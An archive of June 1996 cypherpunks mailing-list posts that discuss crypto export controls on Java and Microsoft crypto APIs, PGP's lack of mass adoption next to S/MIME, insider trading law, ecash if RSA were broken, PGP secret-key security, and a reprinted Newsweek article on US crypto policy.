>store, so you target your advertisements accordingly.

Of course, there are other ways to get demographics and 
other ways to target advertising and other ways to get
big spenders into your store.

>I also shop only with cash, here and elsewhere.  
>Double-blinded e-cash will be the only way to go, if it 
>ever is the way to go.

And I bet they don't turn down your cash just because it
contains no demographic data.  Thus demonstrating the 
pragmatism of the market with regard to anonymity.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: br@doppio.Eng.Sun.COM (Benjamin Renaud)
Date: Tue, 4 Jun 1996 07:46:35 +0800
To: cypherpunks@toad.com
Subject: Re: Java Crypto API questions
Message-ID: <199606031746.KAA01680@springbank.eng.sun.com>
MIME-Version: 1.0
Content-Type: text/plain


Martin Minow (minow@apple.com) writes:

[...]

|-- Policies = Assertions + Capabilities. That's what my notes

Policies are statements like:

"code endorsed by any one of the following signatures (say three of 
my friends) can access the public part of my file system"

This is hard. It's probably not going to make it in the first release.
The simple first pass is to say "code signed by x, y, and z" can do 
whatever it wants.

|-- Feedback to security-api@java.sun.com.

The alias had some trouble over the week-end. It should be working
fine now.

-- Benjamin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 4 Jun 1996 07:28:49 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <v02120d03add8d1062108@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:33 6/2/96, Deranged Mutant wrote:

>The reasons PGP hasn't become widely used are because of it's lack of
>user-friendliness and poor integration into other tools, irregardless
>of S/MIME.

I concur. It is that lack of integration that gave S/MIME the space to grow
in. Now it is too late to achieve the market dominance that PGP should have
achieved long ago. S/MIME *will* be the email encryption standard used by
Joe Sixpack.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 4 Jun 1996 07:21:01 +0800
To: andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Java Crypto API questions
Message-ID: <v02120d04add8d2c68a13@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 6/3/96, Jeff Weinstein wrote:

>> Sun can export the signature though.  The vendor already has the package,
>> they just need the sig/cert...
>
>  Not likely.  Sun will probably be required to agree not to do this
>as a condition of exporting software with "pluggable crypto".  Software
>with hooks for crypto functions is treated the same as the actual crypto
>as far as the ITAR is concerned.

Then how can Sun claim that their system is
1. Exportable
2. Does RC-4 and DES?

The Java Crypto AIP presentation slides that are available on Sun's website
clearly make both claims.

Unfortunately, the feedback address that Sun provides in the slides is
unknow to their mailserver (at least it was last week) and no further
information seem to be avaiable about their "public and open" policy.

Confused,

Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 3 Jun 1996 22:41:19 +0800
To: cypherpunks@toad.com
Subject: PRY_ing
Message-ID: <199606031105.LAA22382@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-3-96. NYP: 
 
   "As privacy grows scarcer on the Internet, people finally 
   start to take notice." Denise Caruso column. 
 
      Tomorrow, the Federal Trade Commission's Bureau of 
      Consumer Protection is sponsoring a public workshop in 
      Washington called "Consumer Privacy on the Global 
      Information Infrastructure." The F.T.C.'s intention is 
      to find out how much consumers and the industry really 
      know about critical privacy issues created by what it 
      calls "the emerging on-line marketplace," and to look at 
      various ways to protect personal data. 
 
      Privacy on data networks is a complex issue. It includes 
      thorny questions about anonymity -- who should be 
      allowed to be anonymous in network interactions, and 
      under what circumstances -- and the red-hot debate over 
      digital encryption, which can protect private 
      communication and transactions from all prying eyes, 
      including the Government's. 
 
   PRY_ing 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 4 Jun 1996 08:52:13 +0800
To: cypherpunks@toad.com
Subject: Crypto APIs Considered Harmful
Message-ID: <add86d220702100431c8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



There are obviously lots of snags and restrictions being imposed on crypto
APIs. "Hooks for crypto" lead to trouble of various sorts.

Well, we've talked about this before, but I'll say it again:

* For now and for the foreseeable future, maybe the focus should be on
better and more efficiently integrating crypto (e.g., straight PGP) with
the _contents_ of programs (e.g, the innermost pure text blocks, such as
what you are now reading). The integration can be done separately and
orthogonally from the basic crypto package, just as PGP did.

* This is largely, in my opinion, what made PGP so popular. Whether one had
a PC. a Mac, an Amiga, various flavors of Unix, etc., one could send and
receive messages with PGP to other users, regardless of their platforms or
their choice of mailers, editors, word processors, newsreaders, or
browsers. This was because PGP was a "payload-centric" (to coin a phrase)
program.

* PGP did not need to know any details of the message headers, MIME sorts
of stuff (though a MIME field for PGP exists, as I understand it). Thus,
there were no "hooks" in PGP for specific mailers, editors, etc., except
things people added later.

* Better integration is needed between crypto and mailers, editors, Web
browsers, but then this runs smack into the "crypto API" issue. (It also
narrows the richness of applications, in the sense that if a lot of work
goes into "Netscape 4.x with S/MIME," as a likely example, then there are
fewer combinations of crypto + tools.)

Thus, it seems to me that we gain more overall leverage, and more
flexibility, and less hassle from the ITAR folks, if more of the focus is
kept on the "crypto API" it is essentially impossible to control: the
message payload.

So long as ASCII (or Unicode, increasingly) message blocks can be handled
by a variety of editors, mailers, news programs, browsers, etc., it will be
impossible to stop users from using crypto on these blocks.

But if crypto is tied to specific browsers, mailers, etc., this gives the
NSA and ITAR office a way to impose limits.

I think there are a _lot_ of advantages to maintaining orthogonality, to
_not_ more tightly integrating crypto with mailers and browsers.

Sure, it would be very nice if hooks existed. But the fact is that this
gives the NSA an avenue for restricting export of programs (e.g.,
Netscape), and such restrictions may cause companies like Netscape to
compromise by giving _everyone_ a "weaker-but-more-tightly-integrated"
crypto package.

I would rather have a "strong-as-I-wish-but-loosely-integrated" package!

(Greater convenience can be handled on a platform-by-platform basis,
possibly easier than trying to get industry-wide compliance with a crypto
API spec. Thus, on the Mac it is possible to have macros or scripts which
take a received message (from whatever source and with whichever mailer,
browser, etc.), process the message block, and return the result to another
window or as a file. MacPGP mostly works this way, and other enhancements
exist as well. At no point was the basic spec for PGP affected, and no
"crypto API" was needed....since the fact that we can _see_ and _read_
messages is in fact the crypto API!)

* Disadvantages of Not Having Crypto APIs in Popular Packages

1. Many users, especially those just getting on the Net, want "all-in-one"
turnkey programs. Not having crypto APIs built into Netscape Navigator, for
example, will reduce the number of users of crypto. (On the other hand, if
most new users are using Navigator 4.x "now with extra strong 47-bit
crypto," they at least get into the habit of using crypto and can
"graduate" up to crypto packages external to Navigator, so maybe it won't
be a disaster for Netscape to offer NSA-approved crypto APIs, so long of
course as external packages can access the message blocks freely.)

2. Not having APIs may affect digital commerce, as robust systems involving
many transfer points should have robust links to message internals, and not
rely on something so potentially prone to error and glitches as a bunch of
macros and scripts. (Can be done, but having a bunch of Macs and PCs
communicating with a bunch of clipboard macros...ugh!)

* Advantages of Not Having Crypto APIs in Popular Packages

1. Separates the development of strong crypto from the development of
browsers, mailers, etc. (I'm not saying Netscape, for example, is
developing the algorithms, but by including integrated crypto they are
automatically in the loop on developments...and maybe it would be better if
they weren't.)

2. Eliminates a reason for controlling the distribution and export of
browsers, mailers, newsreaders, etc. Imagine the glum reaction of the NSA
when they realize that they can't control these programs, because the
"crypto hooks" are only the hooks to basic message payloads...and they
control these.

3. Orthogonality and independent development means the _best_ crypto (PGP,
S/MIME, whatever...) can be combined with whichever mailers and browsers
people want to use. Netscape users will not be limited to S/MIME, for
example, with its strange notions of where the signatures belongs, or its
default key size.

4. In some sense, the "basic data structure" of nearly all personal
communications _is_ the basic ASCII (or Unicode, rich MIME, etc.) message.
At least for the things most _personal_ users are now sending. (I
acknowledge that business users have needs for richer data structures. As
noted in Disadvantage #2, running a commerce system (think of SWIFT) with
macros and scripts reaching into message blocks...shudder! But business
users can work out separate plans.)

5. Finally, placing more of a focus on the messages and not on crypto APIs
for currently popular programs like Microsoft Explorer and Netscape
Navigator makes better use of scarce programming resources. And it is, in
my opinion, a more "grassroots" and "cypherpunkish" thing to do than to try
to work with large corporations to integrate tools into their programs.

(The NSA would clearly rather have crypto tools tightly integrated into
popular programs, despite what some have said. It gives them control and
it's easier for them to jawbone Netscape and Microsoft than a million
users.)

Obvious points. But in light of all the recent moves to limit deployment of
crypto by limiting the "crypto API" approaches, it's useful to remember
that for most applications, the message payload is perfectly suited for
carrying digital signatures, encrypted blocks, etc.

They can't stop the messages, can they?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 4 Jun 1996 06:22:54 +0800
To: perry@piermont.com
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606031523.LAA05288@jekyll.piermont.com>
Message-ID: <199606031507.LAA15317@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:

> Timothy C. May writes:

> > And, how can someone who acts on overheard information--as in the elevator
> > example Sandy cited--be charged with any crime? Unless they are "insiders,"
> > covered by SEC rules about trading, they are free to act on essentially
> > anything they hear.
> 
> No, I'm afraid they aren't. Under the rules, if you have nonpublic
> information, even if you are not a corporate officer, you are an
> insider for purposes of "insider trading" and your trades are illegal.

> > (To elaborate on this: I was never classified as an "insider" during my
> > time at Intel, and I certainly bought and sold the stock based on what
> > products and news I knew was coming out or what rumors I'd heard. Only a
> > select group of executives and staff in the specific departments generating
> > earnings announcements, auditing, etc., were covered.
> 
> Only they were covered by the rules that require registration of all
> trades, you mean. You are completely confusing two uses of the word
> "insider".

IANAL, but I think you must be wrong about this, Perry.  If this were
the case then, as an employee of company XYZ, I would never be permitted
to buy XYZ stock (which is clearly not the case) since I *always* have
information that others outside the company do not (about staff changes,
product plans and such).  I suspect the deciding factor must have to do
with the ability to execute actions which have substantial direct effects
on the stock price (i.e. buying a company, declaring dividends, having a
massive downsizing, etc.).


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RHS Linux User <jthomas@gateway.webwon.com>
Date: Tue, 4 Jun 1996 04:55:14 +0800
To: cypherpunks@toad.com
Subject: Re: Java Crypto API questions
In-Reply-To: <31B2ADA5.577D@netscape.com>
Message-ID: <Pine.LNX.3.91.960603111342.11161A-100000@gateway.webwon.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 3 Jun 1996, Jeff Weinstein wrote:

> Andrew Loewenstern wrote:
> > 
> > Sun can export the signature though.  The vendor already has the package,
> > they just need the sig/cert...
> 
>   Not likely.  Sun will probably be required to agree not to do this
> as a condition of exporting software with "pluggable crypto".  Software
> with hooks for crypto functions is treated the same as the actual crypto
> as far as the ITAR is concerned.

When Microsoft announced their crypto API, they also announced that their 
signatures on crypto modules would be export-restricted.  According to 
e-mail I received from a Microsoft employee on the project, the act of 
signing was considered a "defense service" under ITAR, so exporting the 
signature would somehow be performing defense services for foreign 
persons.  It makes slightly less sense to me than the rest of the crypto 
export restrictions do, but I guess that's the deal that Microsoft worked 
out with the Feds in order to be allowed to do a crypto API at all.

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 4 Jun 1996 08:17:16 +0800
To: cypherpunks@toad.com
Subject: Crypto APIs Considered Harmful
Message-ID: <add87a9e090210045cd0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


A typo when I wrote:


2. Eliminates a reason for controlling the distribution and export of
browsers, mailers, newsreaders, etc. Imagine the glum reaction of the NSA
when they realize that they can't control these programs, because the
"crypto hooks" are only the hooks to basic message payloads...and they
control these.
                                                   ^
                                                  *can't*

I meant to include the "can't."

A Web browser with no hooks for crypto absolutely will not be
export-controlled. But if users in Slovakia and Beninia can _see_ the
messages, as they of course can, then crypto programs they supply
themselves can of course see and act on the messages. (Copying to a
clipboard, for example, and lots of other ways.)

No way the NSA can control that.

Concentrating on integrating crypto tightly into commercial programs is
playing the NSA's game.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 04:16:15 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <add71e4c06021004bdfb@[205.199.118.202]>
Message-ID: <199606031523.LAA05288@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Namely, are the people "talking up" a stock committing a crime?

Possibly.

> And, how can someone who acts on overheard information--as in the elevator
> example Sandy cited--be charged with any crime? Unless they are "insiders,"
> covered by SEC rules about trading, they are free to act on essentially
> anything they hear.

No, I'm afraid they aren't. Under the rules, if you have nonpublic
information, even if you are not a corporate officer, you are an
insider for purposes of "insider trading" and your trades are illegal.

Don't go to Tim for advice on steering clear of the SEC's enforcement
people.

> (To elaborate on this: I was never classified as an "insider" during my
> time at Intel, and I certainly bought and sold the stock based on what
> products and news I knew was coming out or what rumors I'd heard. Only a
> select group of executives and staff in the specific departments generating
> earnings announcements, auditing, etc., were covered.

Only they were covered by the rules that require registration of all
trades, you mean. You are completely confusing two uses of the word
"insider".

> But ordinary people, even employees of a company, are not
> considered to be "insiders" and hence are not covered by insider trading
> laws.)

Follow Tim's advice and wind up in jail. I can give people specific
cases if they like.

Securities laws are extremely complex, extraordinarily broad, and
subject to extremely flexible interpretation. I would suggest not
attempting to skate a fine line near them -- the ice is very thin.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 4 Jun 1996 08:06:58 +0800
To: cypherpunks@toad.com
Subject: PGP's ubiquity (was Re: NRC Session Hiss)
Message-ID: <2.2.32.19960603182730.006afff8@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:15 PM 6/2/96 -0700, Lucky Green wrote:

>That PGP is ubiquitous is subject to discussion. PGP is widely available, 
>but that doesn't mean that it is widely used. What percentage of email is 
>PGP encrypted? Less than half a percent?

Much, much less than that. I get about five hundred messages a day. On the
average day, none of them are PGP-encrypted. On the average _week_, none of
them are PGP-encrypted. And by virtue of having a PGP key signed and on the
servers, I'm better prepared to send and receive such mail than at least
99.9% of the net.population.

>PGP was a failure in the mass market, regardless how popular it may be
>with some subscribers of this list. 

True, and important. 

In one sense it doesn't matter how good a security system is if a manageable
set of people are the only ones using it. There are only a few thousand IDs
in the key servers, and vast majority of those, I'd guess, are like me in
not using PGP routinely. But even if we were, the institutions of the State
have experience in the long-term surveillance of groups quite a bit larger
than us.

This is where I think some forms of cyber-elitism fail. So I've got access
to darned good tools. The State has numbers and resources, and memes about
how the masses do right when they acquiesce, on its side. 

We are not, I think, particularly secure in an environment where the very
fact of using secure tools stands out from the herd. But what the herd needs
are good tools with good simple front ends, and a) those who design the
tools generally don't care about the herd and so do nothing to get outside
the crypto ghetto and b) those in a position to design the front ends
generally have more immediately rewarding things to do or don't know about
the tools themselves.

Five years ago I was quite optimistic about strong security as an important
element in bringing about the post-statist society I desire. Now I'm
pessimistic. I just don't see signs of the stuff spreading sufficiently. And
while S/MIME has interesting features (based on what I've read so far), the
default 40-bit setup is basically no protection at all. And I know just how
hard it is to get people comfortable using non-default features.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 4 Jun 1996 08:39:13 +0800
To: cypherpunks@toad.com
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <2.2.32.19960603182733.006b6250@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:33 AM 6/3/96 +0000, Deranged Mutant wrote:

>In part because it's not well integrated with mailers.  That could 
>change with a PGP3 DLL.

I have a growing feeling that PGP 3 is never going to happen. Or that if it
does, it will happen only after the passage of more draconian anti-privacy
laws, and the guys working on it will be forced to include sundry backdoor
stuff or drop it altogether.

I suspect someone could do quite nicely by going ahead and developing a
2.6.2 or 2.6.3 DLL.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 4 Jun 1996 08:40:31 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Fate of Ecash if RSA is cracked?
Message-ID: <199606031845.LAA26772@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:04 AM 6/3/96 +0000, Greg Miller wrote:
>On Sun, 2 Jun 1996 17:42:49 -0500 (CDT), you wrote:
>
>>What would happen with all ecash that's been issued? Of course
>>criminals would be able to forge large amounts of authentic-looking
>>ecash, so banks should not be honoring requests to convert e-cash into
>>real cash.
>
>        As I understand it, ecash shouldn't be withdrawn until shortly before
>it
>is spent.  If the RSA algorithm is broken, then then banks could refuse the
>withdrawal (and depositing) of money as ecash.  The remainder of the money in
>each users' account would have to be withdrawn through conventional methods.
>
>        Of course all the outstanding (between withdrawl and deposit) ecash
>could be a problem.

Banks running Digicash might be able to credit you account for cash on your
disk using the same mechanisms they use to recover your ecash after a hard
disk crash.  You shouldn't need too much electronic identification since
the only result is to move money to yourself.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: br@doppio.Eng.Sun.COM (Benjamin Renaud)
Date: Tue, 4 Jun 1996 08:33:05 +0800
To: shamrock@netcom.com
Subject: Re: Java Crypto API questions
Message-ID: <199606031855.LAA01849@springbank.eng.sun.com>
MIME-Version: 1.0
Content-Type: text/plain


|Unfortunately, the feedback address that Sun provides in the slides is
|unknow to their mailserver (at least it was last week) and no further
|information seem to be avaiable about their "public and open" policy.

In the actual talk, I said "will be public and open", that is when we
actually announce the policy it will be public and open. The things
that are certain about it is that it will be constrained only by export
considerations, and that we'll sign competitors' packages.

I am hoping that I can get a spec document for the API ready by the end
of the month. By then we will have more details regarding the export
stuff. In the meantime, I'll see if we can get an interim FAQ
together.

The security-api@java.sun.com address should be working now. 

-- Benjamin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 05:41:40 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <N9BXoD32w165w@bwalk.dm.com>
Message-ID: <199606031601.MAA05367@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dr. Dimitri Vulis writes:
> ichudov@algebra.com (Igor Chudov @ home) writes:
> > scheme gets broken somehow? Suppose, for example, that someone
> > discovers an ultra-fast factoring algorithm or something like that.
> 
> This'll happen, probably sooner than later.

Why do you assume that? There are plenty of problems that are
provably not solvable in non-exponential time even if P=NP. What makes
you think this one is going to be solved?

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 4 Jun 1996 08:48:37 +0800
To: RHS Linux User <cypherpunks@toad.com
Subject: Re: Java Crypto API questions
Message-ID: <199606031915.MAA25368@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 AM 6/3/96 -0400, RHS Linux User wrote:
>
>
>On Mon, 3 Jun 1996, Jeff Weinstein wrote:
>
>> Andrew Loewenstern wrote:
>> > 
>> > Sun can export the signature though.  The vendor already has the package,
>> > they just need the sig/cert...
>> 
>>   Not likely.  Sun will probably be required to agree not to do this
>> as a condition of exporting software with "pluggable crypto".  Software
>> with hooks for crypto functions is treated the same as the actual crypto
>> as far as the ITAR is concerned.
>
>When Microsoft announced their crypto API, they also announced that their 
>signatures on crypto modules would be export-restricted.

That doesn't mean that they are, LEGALLY, export-restricted.  Microsoft 
can't generally bind third parties to agreements with the government.  Even 
in circumstances where it might appear that they can enter into an agreement 
with a customer, Microsoft is sufficiently big that any terms it forces on 
customers are automatically suspect of being oppressive, especially if there 
is no valid business reason for a particular restriction.  Besides, a 
violation of any such agreement is merely a violation of an agreement with 
Microsoft, not the USG.   It is unlikely Microsoft is going to take 
individual customers of their customer to court for violation of some 
no-export agreement.

>  According to 
>e-mail I received from a Microsoft employee on the project, the act of 
>signing was considered a "defense service" under ITAR, so exporting the 
>signature would somehow be performing defense services for foreign 
>persons. 

Even if it is arguable that the signing of a piece of software constitutes a 
"defense service," that service is performed for somebody, domestically, who 
delivers that software to Microsoft.  Once that software is signed, the 
"defense service" is over and done with.  At that point, you merely have an 
object, a signature, which cannot encrypt or decrypt data.  It is even less 
useful than a microprocessor or RAM at facilitating encryption.

 It makes slightly less sense to me than the rest of the crypto 
>export restrictions do, but I guess that's the deal that Microsoft worked 
>out with the Feds in order to be allowed to do a crypto API at all.

I think you've hit the nail on the head:  The Feds were well aware that 
Microsoft had plenty of money to challenge them in court, and they would 
almost certainly have lost.  So the Feds gave in on the API issue, and in 
exchange Microsoft agreed to publicly state that "the signatures on crypto 
modules would be export-restricted."  Doesn't make it so.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 07:07:12 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606031507.LAA15317@jafar.sware.com>
Message-ID: <199606031632.MAA05439@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Barber writes:
> IANAL, but I think you must be wrong about this, Perry.

Nope, I'm not.

> If this were the case then, as an employee of company XYZ, I would
> never be permitted to buy XYZ stock (which is clearly not the case)
> since I *always* have information that others outside the company do
> not (about staff changes, product plans and such).

Funny, that, ain't it.

Well, yes, as I noted, the law is very broad, and selectively
enforced. However, yes indeed -- if you know that Secure Ware is
introducing SuperBozo 2000 next week by virtue of your employment, and
you know it will drive up the stock price, and SuperBozo 2000 is a
deep dark secret, and you load up on shares in the expectation of
making money from that rise, you are indeed cruising for a visit from
the friendly boys at Stock Watch.

> I suspect the deciding factor must have to do
> with the ability to execute actions which have substantial direct effects
> on the stock price (i.e. buying a company, declaring dividends, having a
> massive downsizing, etc.).

There is no real deciding factor other than what a jury will buy. The
law is very broad and extremely vague. It is selectively enforced. A
lot of what is and isn't a violation is based entirely on
prosectorial discretion.

Welcome to the world of securities regulation, where you live under a
government of men, not of laws, and SEC edicts, er, no-action letters
are needed before you sneeze because everything you do every day is
probably a crime somehow.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Huang <hwh6k@fulton.seas.virginia.edu>
Date: Tue, 4 Jun 1996 06:59:42 +0800
To: cypherpunks@toad.com
Subject: Re: Security of PGP if Secret Key Available?
Message-ID: <199606031648.MAA31489@fulton.seas.Virginia.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Jun 3,  2:36, "Robert A. Hayden" wrote:
> However, I got to wondering about the security of PGP assuming somebody 
> trying to read my PGPed stuff has my 1024-bit secret key.  ie, if I have 
> it on my personal computer, and somebody gets my secret key, how much 
> less robust has PGP just become, and what are appropriate and reasonable 
> steps to take to protect this weakness?

If someone else has your secret key, it's safe to assume you're toast. ;)
Better a new key and revocation certificate before the forgeries start
(or before someone ELSE does before you ... <shudder>).

More specifically, if you've failed to assign a passphrase to your
secret key, you ARE toast, because anyone can just pick it up and use
it.

If you did use a passphrase, it becomes a question of breaking either
the passphrase, or the IDEA algorithm used to encrypt your secret key.
It's usually a lot easier to break the passphrase than it is to brute
force IDEA.

See the PGP Passphrase FAQ
(http://www.stack.urc.tue.nl/~galactus/remailers/passphrase-faq.html)
and Arnold Reinhold's page (http://world.std.com/~reinhold/papers.html)
for more details.

-H




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 4 Jun 1996 02:23:50 +0800
To: cypherpunks@toad.com
Subject: Newsweek on Crypto
Message-ID: <199606031301.NAA29204@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Newsweek, June 10, 1996, pp. 49-55. 
 
 
   Scared Bitless 
 
      The arcane world of cryptography used to be the 
      exclusive realm of spies. Now it's everybody's business 
      -- to the chagrin of the government. 
 
   By Steven Levy 
 
      [Photo] Loosen up: Sen. Conrad Burns says the United 
      States should ease the export rules on crypto software 
 
 
   On the face of it, the issue of cryptography -- the 
   technology that employs secret codes to protect information 
   -- seems more suited to math class than "The McLaughlin 
   Group." Yet this once esoteric subject has wound up in the 
   center of a Beltway controversy, complete with 
   congressional infighting, lobbyists, entrenched government 
   agencies, blue-ribbon reports and even a bit of 
   presidential politics. This sudden spotlight on what was 
   previously the domain of deep-black spy stuff turns out to 
   be a good thing, because in the Information Age crypto 
   policy is more than an abstraction: it could provide the 
   difference between security and vulnerability, or even 
   between life and death. Unfortunately, choosing the right 
   policy is not a given, and there the controversy lies. 
 
   Here's the problem: we're increasingly entrusting 
   information to computers -- everything from confidential 
   medical records to business plans to money itself. But how 
   can we provide security so that these data will be 
   protected from eavesdroppers, thieves and saboteurs? The 
   answer hinges on cryptography. By scrambling the 
   information into digital codes, it allows only those 
   entrusted with the keys to decipher those files to see 
   them. Some hot-shot cryptographers have developed systems 
   that can provide all of us with unprecedented security, 
   automatically coding and decoding in such a way that we 
   won't have to know it's there. (We can even have our phone 
   calls encoded something Prince Charles might have 
   appreciated.) Silicon Valley would love to set such a 
   system in motion. It not only would generate revenues, but 
   would also address the main problem that's keeping the 
   Internet from fulfilling its potential as a center of 
   commerce: security. 
 
   Problem solved? Not quite. Law-enforcement and 
   national-security agencies view this prospect with dread. 
   Legal eavesdroppers, like FBI wiretappers and National 
   Security Agency snoopers, couldn't make sense of 
   intercepted transmissions. They warn that we could miss 
   indications of a terrorist act, like a nuke smuggled into 
   Manhattan. In addition, drug dealers, child pornographers 
   and garden-variety thugs could mask their activities with 
   a mere mouse click. 
 
   Even before the Clinton administration took office, the NSA 
   and FBI presented those nightmare scenarios to the 
   transition team. The Clintonites were scared bitless. They 
   vowed to make sure that the worst didn't happen. They 
   understood that cryptography should be put to general use 
   -- but only if it were altered in such a way that the 
   government could, if necessary, get access to secret 
   messages, using a new technology known as "key escrow." The 
   best-known of those schemes was the ill-fated Clipper Chip, 
   and subsequent systems haven't caught on. (Yet another was 
   presented two weeks ago.) Until then they would maintain 
   the strict export controls that treat crypto software as 
   powerful munitions. That's right -- Uncle Sam regards that 
   copy of Netscape you downloaded as sort of a Stinger 
   missile. 
 
   But now the government position of slowing down the flow of 
   crypto is under increasing attack. Software companies 
   complain that regulations cost them money and hold down 
   innovation. Privacy groups complain that the controls reek 
   of Orwell's "1984." Congress is demanding changes. Bob Dole 
   wants to make it an issue. And on Thursday came what Sen. 
   Conrad Burns, a Montana Republican, called "the nail in the 
   coffin" of the Clinton crypto policy: a report by the 
   National Research Council that clearly rebukes the 
   administration's position. Despite the Clinton-Gore attempt 
   to protect us against the abuse of cryptography, says the 
   Congress-commissioned report, our safety is at risk -- 
   because the lack of cryptography has weakened our security. 
 
   Under particular attack are the regulations that limit the 
   strength of exported software like IBM's Lotus Notes, 
   mostly by mandating that the keys that encode and decipher 
   the information not exceed 40 bits (the longer the key, the 
   stronger the protection). Often, domestic users have to 
   settle for this crippled crypto: since software companies 
   are loath to release two versions of their products, they 
   simply choose to offer the weaker, approved-for-export 
   version. 
 
   Meanwhile, foreign companies have no such restrictions, and 
   U.S. companies maintain they are losing sales. Congress has 
   taken up their case; bills introduced by Sen. Patrick 
   Leahy, Rep. Bob Goodlatte and Burns all would relax the 
   export rules. "These bills are pro-privacy, pro-jobs and 
   pro-business," says Leahy. While prospects for passage are 
   slim, the fact that a sizable number of legislators are 
   defying intelligence and law-enforcement agencies is itself 
   significant. 
 
   Crypto policy is even finding its way into the presidential 
   campaign. On a visit to Silicon Valley, Bob Dole was 
   alerted to the problem by Netscape CEO Jim Barksdale. He 
   also saw a chance to chip away at Clinton's support in the 
   high-tech world. Dole not only cosponsored the Senate bills 
   but issued a neo-cypherpunk statement charging that "the 
   administration's big brother proposal will literally 
   destroy America's computer industry." 
